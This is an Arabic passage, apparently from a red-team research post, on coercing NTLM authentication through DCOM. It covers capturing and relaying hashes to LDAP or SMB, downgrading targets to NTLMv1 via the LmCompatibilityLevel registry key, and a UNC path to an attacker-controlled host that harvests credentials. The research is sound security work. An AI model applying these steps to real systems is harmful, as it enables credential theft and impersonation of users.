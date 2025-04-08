والآن، بعد أن عرفنا أنه يمكن تحويل كائن DCOM إلى أداة لاختراق الجلسات، فإن الخطوة التالية هي تحديد الدوال والخصائص التي يمكن الاستفادة منها لإكمال عملية الاختراق. في هذا البحث، استكشفتُ ما إذا كان من الممكن اختراق المستخدم من دون تشغيل حمولة - متبعًا نهجًا مختلفًا عن معظم تقنيات الحركة الجانبية العامة في DCOM.

لقد ركزت على تحقيق نتائج قابلة للمقارنة بتنسيق "من دون ملفات"، ما يعني عدم الحاجة إلى نقل أو تنفيذ أي حمولة على النظام المستهدف. ويُعد هذا التمييز مهمًا لأن نقل وتشغيل الحمولات على النظام المستهدف غالبًا ما يُعد إجراءً "مكلفًا" في عمليات الفريق الأحمر. ومن خلال تجنب هذه الخطوة، تقل مخاطر تشغيل الضوابط الأمنية الشائعة بشكل كبير. لذلك، كنت أسعى إلى اختراق حسابات المستخدمين عن بُعد عن طريق فرض مصادقة NTLM عبر DCOM.

توجد عدة مزايا رئيسية لفرض عمليات مصادقة NTLM بدلاً من تنفيذ تقنيات الحركة الجانبية التقليدية:

تسجيل قيم تجزئة NTLMv1/NTLMv2 ومحاولة اختراقها في وضع عدم الاتصال

إعادة توجيه قيم تجزئة NTLMv1 أو WebDAV NTLMv2 إلى خدمات الشبكة الأخرى، مثل LDAP أو SMB، لتنفيذ إجراءات كمستخدم متأثر

تجنب نقل وتشغيل أي حمولة على النظام المستهدف، والذي عادةً ما يتطلب مزيدًا من التدقيق من أدوات الأمان

تجنب التفاعل مع عملية LSASS، ما يقلل من مخاطر الاكتشاف

حتى تاريخ كتابة هذا المنشور، لم يكن توقيع LDAP وربط القناة مطلوبين أو مفروضين بشكل افتراضي على معظم وحدات التحكم في النطاق. وتُعد مزايا الأمان هذه مفروضة فقط على Windows Server 2025. وهذا يعني أنه إذا تمكنا من فرض مصادقة NTLMv1 أو WebDAV من النظام المستهدف، فيمكننا إعادة توجيهها إلى LDAP وتنفيذ الإجراءات بصفتنا المستخدم المتأثر. وبالمثل، لا يلزم وجود توقيع SMB بشكل افتراضي على خوادم Windows، باستثناء وحدات التحكم في النطاق.

ثمة أمر آخر مهم ينبغي أن يؤخذ في الحسبان وهو أن قيم تجزئة NTLMv1 يمكن اختراقها بسهولة باستخدام جداول قوس قزح، والتي شاركها علنًا Nic Losby في ديسمبر 2024. تقلل هذه الجداول بشكل كبير من الوقت والجهد اللازمين لاستعادة بيانات اعتماد NTLM من قيم تجزئة NTLMv1. للحصول على تجزئة NTLMv1 بدلاً من تجزئة NTLMv2، نعدل مفتاح التسجيل التالي على النظام المستهدف:

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

يؤدي تعيين قيمة LmCompatibilityLevel على 2 أو أقل إلى إجبار النظام على الرجوع إلى الإصدار NTLMv1 للمصادقة. ويكون هذا التعديل ممكنًا من خلال امتيازات المسؤول المحلي ويشار إليه عمومًا باسم "هجوم الرجوع إلى الإصدار الأقدم NetNLMv1".

أو يمكننا تسجيل مصادقة WebDAV وإعادة توجيهها إلى LDAP، حيث يمكن إعادة توجيه عمليات المصادقة المستندة إلى HTTP إلى هذه الخدمة. إذا لم تكن خدمة WebClient تعمل بالفعل بامتيازات وصول، فيمكننا تمكينها عن بُعد على النظام المستهدف. وبمجرد التمكين، يمكننا فرض مصادقة WebDAV NTLM على برنامج التجسس لدينا عن طريق تحديد اسم NetBIOS الخاص بالجهاز في مسار UNC. على سبيل المثال:

\\MYHACKERBOX@80\giveme\creds.txt

لمزيد من المعلومات حول هجمات إعادة توجيه NTLM والبروتوكولات التي يمكن إعادة توجيهها إلى نقاط النهاية المختلفة، يُرجى الرجوع إلى المصدر التالي هنا.